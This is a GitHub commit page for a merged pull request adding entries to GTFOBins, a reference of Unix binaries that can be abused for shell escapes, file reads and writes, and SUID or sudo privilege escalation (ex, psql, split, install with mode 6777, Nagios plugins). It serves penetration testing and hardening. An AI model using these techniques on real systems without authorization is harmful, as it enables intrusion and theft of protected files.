Merge pull request #147 from mindfuckup/master

This commit is contained in:
Andrea Cardaci 2020-12-20 21:31:05 +01:00 committed by GitHub
commit 65857d486b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
26 changed files with 408 additions and 3 deletions

15
_gtfobins/basenc.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
basenc --base64 $LFILE | basenc -d --base64
suid:
- code: |
LFILE=file_to_read
basenc --base64 $LFILE | basenc -d --base64
sudo:
- code: |
LFILE=file_to_read
sudo basenc --base64 $LFILE | basenc -d --base64
---

11
_gtfobins/check_by_ssh.md Normal file
View File

@ -0,0 +1,11 @@
---
description: |
This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
functions:
shell:
- description: The shell will only last 10 seconds.
code: check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" -H localhost -C xx
sudo:
- description: The shell will only last 10 seconds.
code: sudo check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" -H localhost -C xx
---

13
_gtfobins/check_cups.md Normal file
View File

@ -0,0 +1,13 @@
---
description: |
This is the `check_cups` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
functions:
file-read:
- code: |
LFILE=file_to_read
check_cups --extra-opts=@$LFILE
sudo:
- code: |
LFILE=file_to_read
sudo check_cups --extra-opts=@$LFILE
---

21
_gtfobins/check_log.md Normal file
View File

@ -0,0 +1,21 @@
---
description: |
This is the `check_log` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
functions:
file-read:
- code: |
LFILE=file_to_read
OUTPUT=output_file
check_log -F $LFILE -O $OUTPUT
cat $OUTPUT
file-write:
- code: |
LFILE=file_to_write
INPUT=input_file
check_log -F $INPUT -O $LFILE
sudo:
- code: |
LFILE=file_to_write
INPUT=input_file
sudo check_log -F $INPUT -O $LFILE
---

13
_gtfobins/check_memory.md Normal file
View File

@ -0,0 +1,13 @@
---
description: |
This is the `check_memory` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
functions:
file-read:
- code: |
LFILE=file_to_read
check_memory --extra-opts=@$LFILE
sudo:
- code: |
LFILE=file_to_read
sudo check_memory --extra-opts=@$LFILE
---

13
_gtfobins/check_raid.md Normal file
View File

@ -0,0 +1,13 @@
---
description: |
This is the `check_raid` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
functions:
file-read:
- code: |
LFILE=file_to_read
check_raid --extra-opts=@$LFILE
sudo:
- code: |
LFILE=file_to_read
sudo check_raid --extra-opts=@$LFILE
---

View File

@ -0,0 +1,26 @@
---
description: |
This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
functions:
command:
- description: The host example.net must return a certificate via TLS
code: |
COMMAND=id
OUTPUT=output_file
TF=$(mktemp)
echo "$COMMAND | tee $OUTPUT" > $TF
chmod +x $TF
check_ssl_cert --curl-bin $TF -H example.net
cat $OUTPUT
sudo:
- description: The host example.net must return a certificate via TLS
code: |
COMMAND=id
OUTPUT=output_file
TF=$(mktemp)
echo "$COMMAND | tee $OUTPUT" > $TF
chmod +x $TF
umask 022
check_ssl_cert --curl-bin $TF -H example.net
cat $OUTPUT
---

View File

@ -0,0 +1,13 @@
---
description: |
This is the `check_statusfile` Nagios plugi plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
functions:
file-read:
- code: |
LFILE=file_to_read
check_statusfile $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo check_statusfile $LFILE
---

View File

@ -1,12 +1,12 @@
--- ---
description: This can be run with elevated privileges to change permissions and then read, write, or execute a file. description: This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.
functions: functions:
suid: suid:
- code: | - code: |
LFILE=file_to_change LFILE=file_to_change
./chmod 0777 $LFILE ./chmod 6777 $LFILE
sudo: sudo:
- code: | - code: |
LFILE=file_to_change LFILE=file_to_change
sudo chmod 0777 $LFILE sudo chmod 6777 $LFILE
--- ---

17
_gtfobins/column.md Normal file
View File

@ -0,0 +1,17 @@
---
description: |
`column` expects textual data.
functions:
file-read:
- code: |
LFILE=file_to_read
column $LFILE
suid:
- code: |
LFILE=file_to_read
./column $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo column $LFILE
---

15
_gtfobins/comm.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
comm $LFILE /dev/null 2>/dev/null
suid:
- code: |
LFILE=file_to_read
comm $LFILE /dev/null 2>/dev/null
sudo:
- code: |
LFILE=file_to_read
sudo comm $LFILE /dev/null 2>/dev/null
---

18
_gtfobins/csplit.md Normal file
View File

@ -0,0 +1,18 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
csplit $LFILE 1
cat xx01
suid:
- code: |
LFILE=file_to_read
csplit $LFILE 1
cat xx01
sudo:
- code: |
LFILE=file_to_read
csplit $LFILE 1
cat xx01
---

24
_gtfobins/ex.md Normal file
View File

@ -0,0 +1,24 @@
---
functions:
shell:
- code: |
ex
!/bin/sh
file-write:
- code: |
ex file_to_write
a
DATA
.
w
q
file-read:
- code: |
ex file_to_read
,p
q
sudo:
- code: |
sudo ex
!/bin/sh
---

14
_gtfobins/install.md Normal file
View File

@ -0,0 +1,14 @@
---
description: This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a copy of the file.
functions:
suid:
- code: |
LFILE=file_to_change
TF=$(mktemp)
./install -m 6777 $LFILE $TF
sudo:
- code: |
LFILE=file_to_change
TF=$(mktemp)
sudo install -m 6777 $LFILE $TF
---

15
_gtfobins/join.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
join -a 2 /dev/null $LFILE
suid:
- code: |
LFILE=file_to_read
join -a 2 /dev/null $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo join -a 2 /dev/null $LFILE
---

View File

@ -1,5 +1,10 @@
--- ---
functions: functions:
file-read:
- description: The file is typeset and some warning messages may appear.
code: |
LFILE=file_to_read
nroff $LFILE
shell: shell:
- code: | - code: |
TF=$(mktemp -d) TF=$(mktemp -d)

15
_gtfobins/paste.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
paste $LFILE
suid:
- code: |
LFILE=file_to_read
paste $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo paste $LFILE
---

16
_gtfobins/pr.md Normal file
View File

@ -0,0 +1,16 @@
---
description: Some bytes are altered so it might not be suitable for binary files.
functions:
file-read:
- code: |
LFILE=file_to_read
pr -T $LFILE
suid:
- code: |
LFILE=file_to_read
pr -T $LFILE
sudo:
- code: |
LFILE=file_to_read
pr -T $LFILE
---

14
_gtfobins/psql.md Normal file
View File

@ -0,0 +1,14 @@
---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions:
shell:
- code: |
psql
\?
!/bin/sh
sudo:
- code: |
psql
\?
!/bin/sh
---

15
_gtfobins/rev.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
rev $LFILE | rev
suid:
- code: |
LFILE=file_to_read
./rev $LFILE | rev
sudo:
- code: |
LFILE=file_to_read
sudo rev $LFILE | rev
---

27
_gtfobins/split.md Normal file
View File

@ -0,0 +1,27 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
TF=$(mktemp)
split $LFILE $TF
cat $TF*
command:
- description: Command execution using an existing or newly created file.
code: |
COMMAND=id
TF=$(mktemp)
split --filter=$COMMAND $TF
- description: Command execution using stdin (and close it directly).
code: |
COMMAND=id
echo | split --filter=$COMMAND /dev/stdin
shell:
- description: The shell prompt is not printed.
code: |
split --filter=/bin/sh /dev/stdin
sudo:
- description: The shell prompt is not printed.
code: |
split --filter=/bin/sh /dev/stdin
---

17
_gtfobins/ss.md Normal file
View File

@ -0,0 +1,17 @@
---
description: |
The file content is actually parsed so only a part of the first line is returned as a part of an error message.
functions:
file-read:
- code: |
LFILE=file_to_read
ss -a -F $LFILE
suid:
- code: |
LFILE=file_to_read
./ss -a -F $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo ss -a -F $LFILE
---

17
_gtfobins/ssh-keyscan.md Normal file
View File

@ -0,0 +1,17 @@
---
description: |
The file content is actually parsed so only a part of each line is returned as a part of an error message.
functions:
file-read:
- code: |
LFILE=file_to_read
ssh-keyscan -f $LFILE
suid:
- code: |
LFILE=file_to_read
./ssh-keyscan -f $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo ssh-keyscan -f $LFILE
---

17
_gtfobins/tbl.md Normal file
View File

@ -0,0 +1,17 @@
---
description: |
The read file content is corrupted by additional text at the beginning.
functions:
file-read:
- code: |
LFILE=file_to_read
tbl $LFILE
suid:
- code: |
LFILE=file_to_read
./tbl $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo tbl $LFILE
---

17
_gtfobins/troff.md Normal file
View File

@ -0,0 +1,17 @@
---
description: |
The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.
functions:
file-read:
- code: |
LFILE=file_to_read
troff $LFILE
suid:
- code: |
LFILE=file_to_read
./troff $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo troff $LFILE
---

17
_gtfobins/xmodmap.md Normal file
View File

@ -0,0 +1,17 @@
---
description: |
The read file content is corrupted by error prints.
functions:
file-read:
- code: |
LFILE=file_to_read
xmodmap -v $LFILE
suid:
- code: |
LFILE=file_to_read
./xmodmap -v $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo xmodmap -v $LFILE
---